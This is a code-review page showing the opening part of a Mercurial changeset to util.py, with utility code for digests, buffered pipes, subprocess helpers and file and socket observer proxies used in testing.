##// END OF EJS Templates
util: add helper to define proxy functions to utils.*
Yuya Nishihara -
r37096:b3079fea default
parent child Browse files
Show More
@@ -1,4373 +1,4347 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 def isatty(fp):
87 87 try:
88 88 return fp.isatty()
89 89 except AttributeError:
90 90 return False
91 91
92 92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 94 # buffering
95 95 if isatty(stdout):
96 96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 97
98 98 if pycompat.iswindows:
99 99 from . import windows as platform
100 100 stdout = platform.winstdout(stdout)
101 101 else:
102 102 from . import posix as platform
103 103
104 104 _ = i18n._
105 105
106 106 bindunixsocket = platform.bindunixsocket
107 107 cachestat = platform.cachestat
108 108 checkexec = platform.checkexec
109 109 checklink = platform.checklink
110 110 copymode = platform.copymode
111 111 executablepath = platform.executablepath
112 112 expandglobs = platform.expandglobs
113 113 explainexit = platform.explainexit
114 114 findexe = platform.findexe
115 115 getfsmountpoint = platform.getfsmountpoint
116 116 getfstype = platform.getfstype
117 117 gethgcmd = platform.gethgcmd
118 118 getuser = platform.getuser
119 119 getpid = os.getpid
120 120 groupmembers = platform.groupmembers
121 121 groupname = platform.groupname
122 122 hidewindow = platform.hidewindow
123 123 isexec = platform.isexec
124 124 isowner = platform.isowner
125 125 listdir = osutil.listdir
126 126 localpath = platform.localpath
127 127 lookupreg = platform.lookupreg
128 128 makedir = platform.makedir
129 129 nlinks = platform.nlinks
130 130 normpath = platform.normpath
131 131 normcase = platform.normcase
132 132 normcasespec = platform.normcasespec
133 133 normcasefallback = platform.normcasefallback
134 134 openhardlinks = platform.openhardlinks
135 135 oslink = platform.oslink
136 136 parsepatchoutput = platform.parsepatchoutput
137 137 pconvert = platform.pconvert
138 138 poll = platform.poll
139 139 popen = platform.popen
140 140 posixfile = platform.posixfile
141 141 quotecommand = platform.quotecommand
142 142 readpipe = platform.readpipe
143 143 rename = platform.rename
144 144 removedirs = platform.removedirs
145 145 samedevice = platform.samedevice
146 146 samefile = platform.samefile
147 147 samestat = platform.samestat
148 148 setbinary = platform.setbinary
149 149 setflags = platform.setflags
150 150 setsignalhandler = platform.setsignalhandler
151 151 shellquote = platform.shellquote
152 152 shellsplit = platform.shellsplit
153 153 spawndetached = platform.spawndetached
154 154 split = platform.split
155 155 sshargs = platform.sshargs
156 156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 157 statisexec = platform.statisexec
158 158 statislink = platform.statislink
159 159 testpid = platform.testpid
160 160 umask = platform.umask
161 161 unlink = platform.unlink
162 162 username = platform.username
163 163
164 164 try:
165 165 recvfds = osutil.recvfds
166 166 except AttributeError:
167 167 pass
168 168 try:
169 169 setprocname = osutil.setprocname
170 170 except AttributeError:
171 171 pass
172 172 try:
173 173 unblocksignal = osutil.unblocksignal
174 174 except AttributeError:
175 175 pass
176 176
177 177 # Python compatibility
178 178
179 179 _notset = object()
180 180
181 181 def safehasattr(thing, attr):
182 182 return getattr(thing, attr, _notset) is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
194 194 def rapply(f, xs):
195 195 """Apply function recursively to every item preserving the data structure
196 196
197 197 >>> def f(x):
198 198 ... return 'f(%s)' % x
199 199 >>> rapply(f, None) is None
200 200 True
201 201 >>> rapply(f, 'a')
202 202 'f(a)'
203 203 >>> rapply(f, {'a'}) == {'f(a)'}
204 204 True
205 205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207 207
208 208 >>> xs = [object()]
209 209 >>> rapply(pycompat.identity, xs) is xs
210 210 True
211 211 """
212 212 if f is pycompat.identity:
213 213 # fast path mainly for py2
214 214 return xs
215 215 return _rapply(f, xs)
216 216
217 217 def bitsfrom(container):
218 218 bits = 0
219 219 for bit in container:
220 220 bits |= bit
221 221 return bits
222 222
223 223 # python 2.6 still have deprecation warning enabled by default. We do not want
224 224 # to display anything to standard user so detect if we are running test and
225 225 # only use python deprecation warning in this case.
226 226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 227 if _dowarn:
228 228 # explicitly unfilter our warning for python 2.7
229 229 #
230 230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 237 if _dowarn and pycompat.ispy3:
238 238 # silence warning emitted by passing user string to re.sub()
239 239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 240 r'mercurial')
241 241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 242 DeprecationWarning, r'mercurial')
243 243
244 244 def nouideprecwarn(msg, version, stacklevel=1):
245 245 """Issue an python native deprecation warning
246 246
247 247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 248 """
249 249 if _dowarn:
250 250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 251 " update your code.)") % version
252 252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
254 254 DIGESTS = {
255 255 'md5': hashlib.md5,
256 256 'sha1': hashlib.sha1,
257 257 'sha512': hashlib.sha512,
258 258 }
259 259 # List of digest types from strongest to weakest
260 260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261 261
262 262 for k in DIGESTS_BY_STRENGTH:
263 263 assert k in DIGESTS
264 264
265 265 class digester(object):
266 266 """helper to compute digests.
267 267
268 268 This helper can be used to compute one or more digests given their name.
269 269
270 270 >>> d = digester([b'md5', b'sha1'])
271 271 >>> d.update(b'foo')
272 272 >>> [k for k in sorted(d)]
273 273 ['md5', 'sha1']
274 274 >>> d[b'md5']
275 275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 276 >>> d[b'sha1']
277 277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 278 >>> digester.preferred([b'md5', b'sha1'])
279 279 'sha1'
280 280 """
281 281
282 282 def __init__(self, digests, s=''):
283 283 self._hashes = {}
284 284 for k in digests:
285 285 if k not in DIGESTS:
286 286 raise Abort(_('unknown digest type: %s') % k)
287 287 self._hashes[k] = DIGESTS[k]()
288 288 if s:
289 289 self.update(s)
290 290
291 291 def update(self, data):
292 292 for h in self._hashes.values():
293 293 h.update(data)
294 294
295 295 def __getitem__(self, key):
296 296 if key not in DIGESTS:
297 297 raise Abort(_('unknown digest type: %s') % k)
298 298 return nodemod.hex(self._hashes[key].digest())
299 299
300 300 def __iter__(self):
301 301 return iter(self._hashes)
302 302
303 303 @staticmethod
304 304 def preferred(supported):
305 305 """returns the strongest digest type in both supported and DIGESTS."""
306 306
307 307 for k in DIGESTS_BY_STRENGTH:
308 308 if k in supported:
309 309 return k
310 310 return None
311 311
312 312 class digestchecker(object):
313 313 """file handle wrapper that additionally checks content against a given
314 314 size and digests.
315 315
316 316 d = digestchecker(fh, size, {'md5': '...'})
317 317
318 318 When multiple digests are given, all of them are validated.
319 319 """
320 320
321 321 def __init__(self, fh, size, digests):
322 322 self._fh = fh
323 323 self._size = size
324 324 self._got = 0
325 325 self._digests = dict(digests)
326 326 self._digester = digester(self._digests.keys())
327 327
328 328 def read(self, length=-1):
329 329 content = self._fh.read(length)
330 330 self._digester.update(content)
331 331 self._got += len(content)
332 332 return content
333 333
334 334 def validate(self):
335 335 if self._size != self._got:
336 336 raise Abort(_('size mismatch: expected %d, got %d') %
337 337 (self._size, self._got))
338 338 for k, v in self._digests.items():
339 339 if v != self._digester[k]:
340 340 # i18n: first parameter is a digest name
341 341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 342 (k, v, self._digester[k]))
343 343
344 344 try:
345 345 buffer = buffer
346 346 except NameError:
347 347 def buffer(sliceable, offset=0, length=None):
348 348 if length is not None:
349 349 return memoryview(sliceable)[offset:offset + length]
350 350 return memoryview(sliceable)[offset:]
351 351
352 352 closefds = pycompat.isposix
353 353
354 354 _chunksize = 4096
355 355
356 356 class bufferedinputpipe(object):
357 357 """a manually buffered input pipe
358 358
359 359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 360 the same time. We cannot probe the buffer state and select will not detect
361 361 that data are ready to read if they are already buffered.
362 362
363 363 This class let us work around that by implementing its own buffering
364 364 (allowing efficient readline) while offering a way to know if the buffer is
365 365 empty from the output (allowing collaboration of the buffer with polling).
366 366
367 367 This class lives in the 'util' module because it makes use of the 'os'
368 368 module from the python stdlib.
369 369 """
370 370 def __new__(cls, fh):
371 371 # If we receive a fileobjectproxy, we need to use a variation of this
372 372 # class that notifies observers about activity.
373 373 if isinstance(fh, fileobjectproxy):
374 374 cls = observedbufferedinputpipe
375 375
376 376 return super(bufferedinputpipe, cls).__new__(cls)
377 377
378 378 def __init__(self, input):
379 379 self._input = input
380 380 self._buffer = []
381 381 self._eof = False
382 382 self._lenbuf = 0
383 383
384 384 @property
385 385 def hasbuffer(self):
386 386 """True is any data is currently buffered
387 387
388 388 This will be used externally a pre-step for polling IO. If there is
389 389 already data then no polling should be set in place."""
390 390 return bool(self._buffer)
391 391
392 392 @property
393 393 def closed(self):
394 394 return self._input.closed
395 395
396 396 def fileno(self):
397 397 return self._input.fileno()
398 398
399 399 def close(self):
400 400 return self._input.close()
401 401
402 402 def read(self, size):
403 403 while (not self._eof) and (self._lenbuf < size):
404 404 self._fillbuffer()
405 405 return self._frombuffer(size)
406 406
407 407 def readline(self, *args, **kwargs):
408 408 if 1 < len(self._buffer):
409 409 # this should not happen because both read and readline end with a
410 410 # _frombuffer call that collapse it.
411 411 self._buffer = [''.join(self._buffer)]
412 412 self._lenbuf = len(self._buffer[0])
413 413 lfi = -1
414 414 if self._buffer:
415 415 lfi = self._buffer[-1].find('\n')
416 416 while (not self._eof) and lfi < 0:
417 417 self._fillbuffer()
418 418 if self._buffer:
419 419 lfi = self._buffer[-1].find('\n')
420 420 size = lfi + 1
421 421 if lfi < 0: # end of file
422 422 size = self._lenbuf
423 423 elif 1 < len(self._buffer):
424 424 # we need to take previous chunks into account
425 425 size += self._lenbuf - len(self._buffer[-1])
426 426 return self._frombuffer(size)
427 427
428 428 def _frombuffer(self, size):
429 429 """return at most 'size' data from the buffer
430 430
431 431 The data are removed from the buffer."""
432 432 if size == 0 or not self._buffer:
433 433 return ''
434 434 buf = self._buffer[0]
435 435 if 1 < len(self._buffer):
436 436 buf = ''.join(self._buffer)
437 437
438 438 data = buf[:size]
439 439 buf = buf[len(data):]
440 440 if buf:
441 441 self._buffer = [buf]
442 442 self._lenbuf = len(buf)
443 443 else:
444 444 self._buffer = []
445 445 self._lenbuf = 0
446 446 return data
447 447
448 448 def _fillbuffer(self):
449 449 """read data to the buffer"""
450 450 data = os.read(self._input.fileno(), _chunksize)
451 451 if not data:
452 452 self._eof = True
453 453 else:
454 454 self._lenbuf += len(data)
455 455 self._buffer.append(data)
456 456
457 457 return data
458 458
459 459 def mmapread(fp):
460 460 try:
461 461 fd = getattr(fp, 'fileno', lambda: fp)()
462 462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 463 except ValueError:
464 464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 465 # if the file is empty, and if so, return an empty buffer.
466 466 if os.fstat(fd).st_size == 0:
467 467 return ''
468 468 raise
469 469
470 470 def popen2(cmd, env=None, newlines=False):
471 471 # Setting bufsize to -1 lets the system decide the buffer size.
472 472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 475 close_fds=closefds,
476 476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 477 universal_newlines=newlines,
478 478 env=env)
479 479 return p.stdin, p.stdout
480 480
481 481 def popen3(cmd, env=None, newlines=False):
482 482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 483 return stdin, stdout, stderr
484 484
485 485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 487 close_fds=closefds,
488 488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 489 stderr=subprocess.PIPE,
490 490 universal_newlines=newlines,
491 491 env=env)
492 492 return p.stdin, p.stdout, p.stderr, p
493 493
494 494 class fileobjectproxy(object):
495 495 """A proxy around file objects that tells a watcher when events occur.
496 496
497 497 This type is intended to only be used for testing purposes. Think hard
498 498 before using it in important code.
499 499 """
500 500 __slots__ = (
501 501 r'_orig',
502 502 r'_observer',
503 503 )
504 504
505 505 def __init__(self, fh, observer):
506 506 object.__setattr__(self, r'_orig', fh)
507 507 object.__setattr__(self, r'_observer', observer)
508 508
509 509 def __getattribute__(self, name):
510 510 ours = {
511 511 r'_observer',
512 512
513 513 # IOBase
514 514 r'close',
515 515 # closed if a property
516 516 r'fileno',
517 517 r'flush',
518 518 r'isatty',
519 519 r'readable',
520 520 r'readline',
521 521 r'readlines',
522 522 r'seek',
523 523 r'seekable',
524 524 r'tell',
525 525 r'truncate',
526 526 r'writable',
527 527 r'writelines',
528 528 # RawIOBase
529 529 r'read',
530 530 r'readall',
531 531 r'readinto',
532 532 r'write',
533 533 # BufferedIOBase
534 534 # raw is a property
535 535 r'detach',
536 536 # read defined above
537 537 r'read1',
538 538 # readinto defined above
539 539 # write defined above
540 540 }
541 541
542 542 # We only observe some methods.
543 543 if name in ours:
544 544 return object.__getattribute__(self, name)
545 545
546 546 return getattr(object.__getattribute__(self, r'_orig'), name)
547 547
548 548 def __nonzero__(self):
549 549 return bool(object.__getattribute__(self, r'_orig'))
550 550
551 551 __bool__ = __nonzero__
552 552
553 553 def __delattr__(self, name):
554 554 return delattr(object.__getattribute__(self, r'_orig'), name)
555 555
556 556 def __setattr__(self, name, value):
557 557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 558
559 559 def __iter__(self):
560 560 return object.__getattribute__(self, r'_orig').__iter__()
561 561
562 562 def _observedcall(self, name, *args, **kwargs):
563 563 # Call the original object.
564 564 orig = object.__getattribute__(self, r'_orig')
565 565 res = getattr(orig, name)(*args, **kwargs)
566 566
567 567 # Call a method on the observer of the same name with arguments
568 568 # so it can react, log, etc.
569 569 observer = object.__getattribute__(self, r'_observer')
570 570 fn = getattr(observer, name, None)
571 571 if fn:
572 572 fn(res, *args, **kwargs)
573 573
574 574 return res
575 575
576 576 def close(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'close', *args, **kwargs)
579 579
580 580 def fileno(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'fileno', *args, **kwargs)
583 583
584 584 def flush(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'flush', *args, **kwargs)
587 587
588 588 def isatty(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'isatty', *args, **kwargs)
591 591
592 592 def readable(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'readable', *args, **kwargs)
595 595
596 596 def readline(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readline', *args, **kwargs)
599 599
600 600 def readlines(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readlines', *args, **kwargs)
603 603
604 604 def seek(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'seek', *args, **kwargs)
607 607
608 608 def seekable(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seekable', *args, **kwargs)
611 611
612 612 def tell(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'tell', *args, **kwargs)
615 615
616 616 def truncate(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'truncate', *args, **kwargs)
619 619
620 620 def writable(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'writable', *args, **kwargs)
623 623
624 624 def writelines(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writelines', *args, **kwargs)
627 627
628 628 def read(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'read', *args, **kwargs)
631 631
632 632 def readall(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'readall', *args, **kwargs)
635 635
636 636 def readinto(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readinto', *args, **kwargs)
639 639
640 640 def write(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'write', *args, **kwargs)
643 643
644 644 def detach(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'detach', *args, **kwargs)
647 647
648 648 def read1(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'read1', *args, **kwargs)
651 651
652 652 class observedbufferedinputpipe(bufferedinputpipe):
653 653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 654
655 655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 656 bypass ``fileobjectproxy``. Because of this, we need to make
657 657 ``bufferedinputpipe`` aware of these operations.
658 658
659 659 This variation of ``bufferedinputpipe`` can notify observers about
660 660 ``os.read()`` events. It also re-publishes other events, such as
661 661 ``read()`` and ``readline()``.
662 662 """
663 663 def _fillbuffer(self):
664 664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 665
666 666 fn = getattr(self._input._observer, r'osread', None)
667 667 if fn:
668 668 fn(res, _chunksize)
669 669
670 670 return res
671 671
672 672 # We use different observer methods because the operation isn't
673 673 # performed on the actual file object but on us.
674 674 def read(self, size):
675 675 res = super(observedbufferedinputpipe, self).read(size)
676 676
677 677 fn = getattr(self._input._observer, r'bufferedread', None)
678 678 if fn:
679 679 fn(res, size)
680 680
681 681 return res
682 682
683 683 def readline(self, *args, **kwargs):
684 684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 685
686 686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 687 if fn:
688 688 fn(res)
689 689
690 690 return res
691 691
692 692 PROXIED_SOCKET_METHODS = {
693 693 r'makefile',
694 694 r'recv',
695 695 r'recvfrom',
696 696 r'recvfrom_into',
697 697 r'recv_into',
698 698 r'send',
699 699 r'sendall',
700 700 r'sendto',
701 701 r'setblocking',
702 702 r'settimeout',
703 703 r'gettimeout',
704 704 r'setsockopt',
705 705 }
706 706
707 707 class socketproxy(object):
708 708 """A proxy around a socket that tells a watcher when events occur.
709 709
710 710 This is like ``fileobjectproxy`` except for sockets.
711 711
712 712 This type is intended to only be used for testing purposes. Think hard
713 713 before using it in important code.
714 714 """
715 715 __slots__ = (
716 716 r'_orig',
717 717 r'_observer',
718 718 )
719 719
720 720 def __init__(self, sock, observer):
721 721 object.__setattr__(self, r'_orig', sock)
722 722 object.__setattr__(self, r'_observer', observer)
723 723
724 724 def __getattribute__(self, name):
725 725 if name in PROXIED_SOCKET_METHODS:
726 726 return object.__getattribute__(self, name)
727 727
728 728 return getattr(object.__getattribute__(self, r'_orig'), name)
729 729
730 730 def __delattr__(self, name):
731 731 return delattr(object.__getattribute__(self, r'_orig'), name)
732 732
733 733 def __setattr__(self, name, value):
734 734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735 735
736 736 def __nonzero__(self):
737 737 return bool(object.__getattribute__(self, r'_orig'))
738 738
739 739 __bool__ = __nonzero__
740 740
741 741 def _observedcall(self, name, *args, **kwargs):
742 742 # Call the original object.
743 743 orig = object.__getattribute__(self, r'_orig')
744 744 res = getattr(orig, name)(*args, **kwargs)
745 745
746 746 # Call a method on the observer of the same name with arguments
747 747 # so it can react, log, etc.
748 748 observer = object.__getattribute__(self, r'_observer')
749 749 fn = getattr(observer, name, None)
750 750 if fn:
751 751 fn(res, *args, **kwargs)
752 752
753 753 return res
754 754
755 755 def makefile(self, *args, **kwargs):
756 756 res = object.__getattribute__(self, r'_observedcall')(
757 757 r'makefile', *args, **kwargs)
758 758
759 759 # The file object may be used for I/O. So we turn it into a
760 760 # proxy using our observer.
761 761 observer = object.__getattribute__(self, r'_observer')
762 762 return makeloggingfileobject(observer.fh, res, observer.name,
763 763 reads=observer.reads,
764 764 writes=observer.writes,
765 765 logdata=observer.logdata,
766 766 logdataapis=observer.logdataapis)
767 767
768 768 def recv(self, *args, **kwargs):
769 769 return object.__getattribute__(self, r'_observedcall')(
770 770 r'recv', *args, **kwargs)
771 771
772 772 def recvfrom(self, *args, **kwargs):
773 773 return object.__getattribute__(self, r'_observedcall')(
774 774 r'recvfrom', *args, **kwargs)
775 775
776 776 def recvfrom_into(self, *args, **kwargs):
777 777 return object.__getattribute__(self, r'_observedcall')(
778 778 r'recvfrom_into', *args, **kwargs)
779 779
780 780 def recv_into(self, *args, **kwargs):
781 781 return object.__getattribute__(self, r'_observedcall')(
782 782 r'recv_info', *args, **kwargs)
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, r'_observedcall')(
786 786 r'send', *args, **kwargs)
787 787
788 788 def sendall(self, *args, **kwargs):
789 789 return object.__getattribute__(self, r'_observedcall')(
790 790 r'sendall', *args, **kwargs)
791 791
792 792 def sendto(self, *args, **kwargs):
793 793 return object.__getattribute__(self, r'_observedcall')(
794 794 r'sendto', *args, **kwargs)
795 795
796 796 def setblocking(self, *args, **kwargs):
797 797 return object.__getattribute__(self, r'_observedcall')(
798 798 r'setblocking', *args, **kwargs)
799 799
800 800 def settimeout(self, *args, **kwargs):
801 801 return object.__getattribute__(self, r'_observedcall')(
802 802 r'settimeout', *args, **kwargs)
803 803
804 804 def gettimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, r'_observedcall')(
806 806 r'gettimeout', *args, **kwargs)
807 807
808 808 def setsockopt(self, *args, **kwargs):
809 809 return object.__getattribute__(self, r'_observedcall')(
810 810 r'setsockopt', *args, **kwargs)
811 811
812 812 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
813 813 DATA_ESCAPE_MAP.update({
814 814 b'\\': b'\\\\',
815 815 b'\r': br'\r',
816 816 b'\n': br'\n',
817 817 })
818 818 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
819 819
820 820 def escapedata(s):
821 821 if isinstance(s, bytearray):
822 822 s = bytes(s)
823 823
824 824 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
825 825
826 826 class baseproxyobserver(object):
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write('\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(': %s\n' % escapedata(data))
838 838 else:
839 839 self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
840 840 self.fh.flush()
841 841 return
842 842
843 843 # Data with newlines is written to multiple lines.
844 844 if self.logdataapis:
845 845 self.fh.write(':\n')
846 846
847 847 lines = data.splitlines(True)
848 848 for line in lines:
849 849 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
850 850 self.fh.flush()
851 851
852 852 class fileobjectobserver(baseproxyobserver):
853 853 """Logs file object activity."""
854 854 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
855 855 logdataapis=True):
856 856 self.fh = fh
857 857 self.name = name
858 858 self.logdata = logdata
859 859 self.logdataapis = logdataapis
860 860 self.reads = reads
861 861 self.writes = writes
862 862
863 863 def read(self, res, size=-1):
864 864 if not self.reads:
865 865 return
866 866 # Python 3 can return None from reads at EOF instead of empty strings.
867 867 if res is None:
868 868 res = ''
869 869
870 870 if self.logdataapis:
871 871 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
872 872
873 873 self._writedata(res)
874 874
875 875 def readline(self, res, limit=-1):
876 876 if not self.reads:
877 877 return
878 878
879 879 if self.logdataapis:
880 880 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
881 881
882 882 self._writedata(res)
883 883
884 884 def readinto(self, res, dest):
885 885 if not self.reads:
886 886 return
887 887
888 888 if self.logdataapis:
889 889 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
890 890 res))
891 891
892 892 data = dest[0:res] if res is not None else b''
893 893 self._writedata(data)
894 894
895 895 def write(self, res, data):
896 896 if not self.writes:
897 897 return
898 898
899 899 # Python 2 returns None from some write() calls. Python 3 (reasonably)
900 900 # returns the integer bytes written.
901 901 if res is None and data:
902 902 res = len(data)
903 903
904 904 if self.logdataapis:
905 905 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
906 906
907 907 self._writedata(data)
908 908
909 909 def flush(self, res):
910 910 if not self.writes:
911 911 return
912 912
913 913 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
914 914
915 915 # For observedbufferedinputpipe.
916 916 def bufferedread(self, res, size):
917 917 if not self.reads:
918 918 return
919 919
920 920 if self.logdataapis:
921 921 self.fh.write('%s> bufferedread(%d) -> %d' % (
922 922 self.name, size, len(res)))
923 923
924 924 self._writedata(res)
925 925
926 926 def bufferedreadline(self, res):
927 927 if not self.reads:
928 928 return
929 929
930 930 if self.logdataapis:
931 931 self.fh.write('%s> bufferedreadline() -> %d' % (
932 932 self.name, len(res)))
933 933
934 934 self._writedata(res)
935 935
936 936 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
937 937 logdata=False, logdataapis=True):
938 938 """Turn a file object into a logging file object."""
939 939
940 940 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
941 941 logdata=logdata, logdataapis=logdataapis)
942 942 return fileobjectproxy(fh, observer)
943 943
944 944 class socketobserver(baseproxyobserver):
945 945 """Logs socket activity."""
946 946 def __init__(self, fh, name, reads=True, writes=True, states=True,
947 947 logdata=False, logdataapis=True):
948 948 self.fh = fh
949 949 self.name = name
950 950 self.reads = reads
951 951 self.writes = writes
952 952 self.states = states
953 953 self.logdata = logdata
954 954 self.logdataapis = logdataapis
955 955
956 956 def makefile(self, res, mode=None, bufsize=None):
957 957 if not self.states:
958 958 return
959 959
960 960 self.fh.write('%s> makefile(%r, %r)\n' % (
961 961 self.name, mode, bufsize))
962 962
963 963 def recv(self, res, size, flags=0):
964 964 if not self.reads:
965 965 return
966 966
967 967 if self.logdataapis:
968 968 self.fh.write('%s> recv(%d, %d) -> %d' % (
969 969 self.name, size, flags, len(res)))
970 970 self._writedata(res)
971 971
972 972 def recvfrom(self, res, size, flags=0):
973 973 if not self.reads:
974 974 return
975 975
976 976 if self.logdataapis:
977 977 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
978 978 self.name, size, flags, len(res[0])))
979 979
980 980 self._writedata(res[0])
981 981
